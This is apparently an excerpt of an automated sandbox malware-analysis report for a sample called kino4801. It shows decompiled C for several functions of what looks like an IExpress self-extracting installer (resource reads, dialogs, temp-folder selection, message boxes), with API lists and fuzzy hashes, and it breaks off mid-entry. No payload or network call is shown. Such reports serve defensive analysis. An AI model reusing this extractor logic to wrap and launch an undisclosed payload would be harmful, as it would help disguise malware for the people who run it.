GetDesktopWindow.USER32 ref: 010D33E2
SetWindowTextA.USER32(?,doza2), ref: 010D33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010D3410
GetDlgItem.USER32(?,00000836), ref: 010D3426
EnableWindow.USER32(00000000), ref: 010D342D
EndDialog.USER32(?,00000000), ref: 010D343F

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D32E2, 010D32E7, 010D3331, 010D3344, 010D335B, 010D336A
doza2, xrefs: 010D33F1

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$doza2
API String ID: 2418873061-4002867030
Opcode ID: 4dac7e142efa71f99b6906d00a97c6df715d6b6ee929a163218919be01644728
Instruction ID: 5e6686feb51dd231202e50faf35146d2fa475f071fb5aaf76a044f0955abef9a
Opcode Fuzzy Hash: 4dac7e142efa71f99b6906d00a97c6df715d6b6ee929a163218919be01644728
Instruction Fuzzy Hash: 595107B4382351B6EB725A799C4CFBF2D99FB46B54F008028FAC59E1C5CEAD9401C362

Uniqueness

Uniqueness Score: -1.00%

Function 010D2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E010D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x10d8004; // 0x261cebeb
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x10d9a3c = __ecx;
				memset(0x10d9140, 0, 0x8fc);
				memset(0x10d8a20, 0, 0x32c);
				memset(0x10d88c0, 0, 0x104);
				 *0x10d93ec = 1;
				_t20 = E010D468F("TITLE", 0x10d9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x10d858c = _t27;
					SetEvent(_t27);
					_t64 = 0x10d9a34;
					if(E010D468F("EXTRACTOPT", 0x10d9a34, 4) != 0) {
						if(( *0x10d9a34 & 0x000000c0) == 0) {
							L12:
							 *0x10d9120 =  *0x10d9120 & _t65;
							if(E010D5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x10d8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x10d8184 != 0) {
										__imp__#17();
									}
									if( *0x10d8a24 == 0) {
										_t57 = _t65;
										if(E010D36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x10d9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x10d9a34 & 0x00000100) == 0 || ( *0x10d8a38 & 0x00000001) != 0 || E010D18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E010D6517(_t57, 0x7d6, _t34, E010D19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E010D2390(0x10d8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E010D44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E010D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x10d8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x10d9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E010D44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E010D44B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x10d8588);
										 *0x10d9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x10d9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E010D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x010d2cb5
0x010d2cbc
0x010d2cc7
0x010d2cc9
0x010d2cd1
0x010d2cd3
0x010d2cd9
0x010d2ce9
0x010d2cf9
0x010d2d0e
0x010d2d15
0x010d2d1c
0x010d2ef3
0x00000000
0x010d2d2d
0x010d2d34
0x010d2d3b
0x010d2d40
0x010d2d48
0x010d2d59
0x010d2d84
0x010d2e1f
0x010d2e1f
0x010d2e2e
0x010d2e41
0x010d2e5a
0x010d2e62
0x010d2e6c
0x010d2e6c
0x010d2e75
0x010d2e77
0x010d2e77
0x010d2e84
0x010d2e8b
0x010d2e94
0x00000000
0x010d2e96
0x010d2e96
0x010d2e9e
0x010d2ea2
0x010d2eba
0x00000000
0x010d2ece
0x010d2ede
0x010d2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x010d2eed
0x010d2eef
0x010d2eef
0x010d2eef
0x010d2eef
0x010d2ea2
0x010d2e86
0x010d2e88
0x010d2e88
0x010d2e43
0x010d2e48
0x00000000
0x010d2e48
0x010d2e30
0x010d2e30
0x010d2ef8
0x010d2f01
0x00000000
0x010d2f01
0x010d2d8a
0x010d2d8f
0x010d2da1
0x00000000
0x010d2da3
0x010d2dae
0x010d2db4
0x010d2dbb
0x00000000
0x010d2dca
0x010d2dd3
0x010d2df5
0x010d2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x010d2dd5
0x010d2dde
0x010d2de3
0x010d2e04
0x010d2e0a
0x010d2e10
0x00000000
0x010d2e10
0x010d2dd3
0x010d2dbb
0x010d2da1
0x010d2d5b
0x010d2d5b
0x010d2d5d
0x010d2d69
0x010d2d6e
0x010d2f06
0x010d2f06
0x010d2f06
0x010d2d59
0x010d2f18

APIs

memset.MSVCRT ref: 010D2CD9
memset.MSVCRT ref: 010D2CE9
memset.MSVCRT ref: 010D2CF9

Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010D2DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2E0A

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Strings

INSTANCECHECK, xrefs: 010D2D95
VERCHECK, xrefs: 010D2E54
TITLE, xrefs: 010D2D09
EXTRACTOPT, xrefs: 010D2D4D
doza2, xrefs: 010D2D04, 010D2DD9, 010D2DF0

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: cd211f050a133d3c0b06d74603606dcbe44f4a5ddf02d523012a6113a665b5e6
Instruction ID: 580bad3d8bc054534bbc3f33c2a6629aad03abbd9d0bfe74aca4934ca9a73c1d
Opcode Fuzzy Hash: cd211f050a133d3c0b06d74603606dcbe44f4a5ddf02d523012a6113a665b5e6
Instruction Fuzzy Hash: 6A512B70341302ABF770A679DD4AB7B3AD8EB55704F008469FEC1D61C9DBB98841C725

Uniqueness

Uniqueness Score: -1.00%

Function 010D34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E010D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x10d91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x10d8584 = _t35;
					E010D43D0(_t35, GetDesktopWindow());
					__eflags =  *0x10d8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E010D4FE0, 0, 0, 0x10d8798);
					 *0x10d879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E010D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x10d858c);
					_t38 =  *0x10d8584; // 0x0
					_t25 = E010D44B9(_t38, 0x4b2, 0x10d1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x10d91d8 = 1;
						SetEvent( *0x10d858c);
						_t39 =  *0x10d879c; // 0x0
						E010D3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x10d858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x10d879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x010d34fb
0x010d34fe
0x010d3665
0x010d3666
0x010d3666
0x010d3668
0x010d366e
0x010d366e
0x010d3671
0x010d3671
0x010d3677
0x00000000
0x010d3677
0x010d3504
0x010d3506
0x010d3507
0x010d350c
0x010d365b
0x010d365f
0x00000000
0x00000000
0x00000000
0x010d3661
0x010d3512
0x010d3515
0x010d35be
0x010d35c1
0x010d35d1
0x010d35d8
0x010d35de
0x010d35f8
0x010d3617
0x010d3617
0x010d3623
0x010d3637
0x010d363d
0x010d3642
0x010d3644
0x00000000
0x010d3646
0x010d3652
0x010d3657
0x010d3658
0x00000000
0x010d3658
0x010d3644
0x010d351b
0x010d351d
0x010d354f
0x010d3553
0x00000000
0x00000000
0x010d355f
0x010d3565
0x010d357c
0x010d3581
0x010d3584
0x010d359b
0x010d35a1
0x010d35a7
0x010d35ad
0x010d35b3
0x010d35b8
0x00000000
0x010d35b8
0x010d3586
0x010d3588
0x00000000
0x00000000
0x010d3590
0x00000000
0x010d3590
0x010d3524
0x010d3535
0x010d3541
0x00000000
0x010d3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 010D3535
EndDialog.USER32(?,?), ref: 010D3541
ResetEvent.KERNEL32 ref: 010D355F
SetEvent.KERNEL32(010D1140,00000000,00000020,00000004), ref: 010D3590
GetDesktopWindow.USER32 ref: 010D35C7
GetDlgItem.USER32(?,0000083B), ref: 010D35F1
SendMessageA.USER32(00000000), ref: 010D35F8
GetDlgItem.USER32(?,0000083B), ref: 010D3610
SendMessageA.USER32(00000000), ref: 010D3617
SetWindowTextA.USER32(?,doza2), ref: 010D3623
CreateThread.KERNEL32 ref: 010D3637
EndDialog.USER32(?,00000000), ref: 010D3671

Strings

doza2, xrefs: 010D361D

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: 2b2a6d753750479d1c0aeecbf8926018f4b0d9738d5303bade9951613f59816d
Instruction ID: 136d5c9b1050aef816db2b6264793d6e65d5da7bbf0b208419ae267604c8ca81
Opcode Fuzzy Hash: 2b2a6d753750479d1c0aeecbf8926018f4b0d9738d5303bade9951613f59816d
Instruction Fuzzy Hash: 7B3183B5241311FBD7701F39EC4DE6A3EA8F789B41F44851AFAC29A69CCB7A8400CB55

Uniqueness

Uniqueness Score: -1.00%

Function 010D4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E010D4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E010D44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x10d88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x10d87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x10d8598;
					_v36 = 1;
					_v32 = E010D4200;
					_v28 = 0x10d88c0;
					 *0x10da288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x10da288(_t32, 0x10d88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x10d88c0 != 0) {
							E010D1680(0x10d87a0, 0x104, 0x10d88c0);
						}
						 *0x10da288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x10d87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x10d88c0);
					_t61 = 0x10d88c0;
					_t4 =  &(_t61[1]); // 0x10d88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x10d88c0; // 0x21b1181
					_t44 = CharPrevA(0x10d88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x10d88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x010d4234
0x010d423c
0x010d4240
0x010d43b2
0x010d43b7
0x010d43c0
0x00000000
0x010d43c5
0x010d424c
0x010d4252
0x010d4257
0x010d43a4
0x010d43a5
0x010d43ab
0x00000000
0x010d43ab
0x010d4263
0x010d4269
0x010d426e
0x00000000
0x00000000
0x010d427a
0x010d4280
0x010d4285
0x00000000
0x00000000
0x010d428d
0x010d4293
0x010d42e6
0x010d42e9
0x010d42ef
0x010d42f4
0x010d42f7
0x010d4300
0x010d4307
0x010d430e
0x010d4315
0x010d431c
0x010d4322
0x010d4326
0x010d432d
0x010d432d
0x010d432f
0x010d4334
0x010d4343
0x010d4349
0x010d434d
0x010d4354
0x010d4354
0x010d435d
0x010d436e
0x010d436e
0x010d437d
0x010d4383
0x010d4387
0x010d438e
0x010d438e
0x010d4387
0x010d4391
0x010d4399
0x00000000
0x010d4295
0x010d429f
0x010d42a5
0x010d42aa
0x010d42aa
0x010d42ad
0x010d42ad
0x010d42af
0x010d42b0
0x010d42b6
0x010d42c2
0x010d42c8
0x010d42ce
0x010d42e4
0x010d42e4
0x00000000
0x010d42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010D4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010D424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 010D4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010D427A
GetTempPathA.KERNEL32(00000104,010D88C0,?,00000001), ref: 010D429F
CharPrevA.USER32(010D88C0,021B1181,?,00000001), ref: 010D42C2
CharPrevA.USER32(010D88C0,00000000,?,00000001), ref: 010D42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010D4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010D43A5

Strings

SHGetPathFromIDList, xrefs: 010D4274
SHBrowseForFolder, xrefs: 010D4246
SHELL32.DLL, xrefs: 010D422F

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: e53ed14191c456ed277d982ba861dde10ca10329ffd741199efddac26fc228a9
Instruction ID: 248a21b21e9344f94b954a62521cb2cc0a0476c9b1b64f9f70d58a362f4d2f6d
Opcode Fuzzy Hash: e53ed14191c456ed277d982ba861dde10ca10329ffd741199efddac26fc228a9
Instruction Fuzzy Hash: B241E974A01354EFE721AF79E8859BE7FB4EB45344F0481AAEDC1E7245CB798901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010D44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E010D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x10d8004; // 0x261cebeb
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x10d8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x10d9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E010D1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E010D171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E010D171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E010D681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E010D67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E010D681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E010D67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E010D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x010d44b9
0x010d44c4
0x010d44cb
0x010d44d8
0x010d44e4
0x010d44eb
0x010d44ee
0x010d44ef
0x010d44ef
0x010d44f1
0x010d44f7
0x010d44f8
0x010d467b
0x010d44fe
0x010d4509
0x010d4518
0x010d4525
0x010d4562
0x010d4568
0x010d4568
0x010d456b
0x010d456b
0x010d456d
0x010d456e
0x010d4572
0x010d4578
0x010d457c
0x010d45cb
0x010d4607
0x010d4607
0x010d460d
0x010d4613
0x010d4617
0x00000000
0x010d461d
0x010d4623
0x010d4626
0x010d4628
0x00000000
0x010d4628
0x010d45cd
0x010d45cd
0x010d45cf
0x010d45cf
0x010d45d2
0x010d45d2
0x010d45d4
0x010d45d5
0x010d45db
0x010d45de
0x010d45e3
0x010d45e9
0x010d45ed
0x00000000
0x010d45f3
0x010d45fd
0x00000000
0x010d4602
0x010d45ed
0x010d457e
0x010d457e
0x010d4580
0x010d4580
0x010d4583
0x010d4583
0x010d4585
0x010d4586
0x010d458a
0x010d458c
0x010d458f
0x010d458f
0x010d4591
0x010d4592
0x010d459b
0x010d459e
0x010d45a3
0x010d45a9
0x010d45ad
0x00000000
0x010d45af
0x010d45af
0x010d45bf
0x010d462d
0x010d4630
0x010d463d
0x010d464e
0x010d464e
0x010d463f
0x010d4640
0x010d4647
0x010d464c
0x00000000
0x00000000
0x010d464c
0x010d4666
0x010d466d
0x010d466f
0x010d4675
0x010d4675
0x010d45ad
0x010d4527
0x010d452e
0x010d453f
0x010d453f
0x010d4530
0x010d4531
0x010d4538
0x010d453d
0x00000000
0x00000000
0x010d453d
0x010d4554
0x010d455a
0x010d455a
0x010d455a
0x010d4525
0x010d468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 010D45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 010D45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 010D460D
MessageBeep.USER32(00000000), ref: 010D4630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 010D4666
LocalFree.KERNEL32(00000000), ref: 010D466F

Part of subcall function 010D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010D686E
Part of subcall function 010D681F: GetSystemMetrics.USER32(0000004A), ref: 010D68A7
Part of subcall function 010D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010D68CC
Part of subcall function 010D681F: RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,?,0000000C), ref: 010D68F4
Part of subcall function 010D681F: RegCloseKey.ADVAPI32(?), ref: 010D6902

Strings

LoadString() Error. Could not load string resource., xrefs: 010D44E4
doza2, xrefs: 010D4545, 010D465A

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: ea9ceda4261ec7d4d56bc8b88bcb2e7bef03217f8872b5618fac4c3a17f4a7ce
Instruction ID: b98619aa3fb895b70509fdeabf313a681244a6680a0bdbe5e15455759a6033c0
Opcode Fuzzy Hash: ea9ceda4261ec7d4d56bc8b88bcb2e7bef03217f8872b5618fac4c3a17f4a7ce
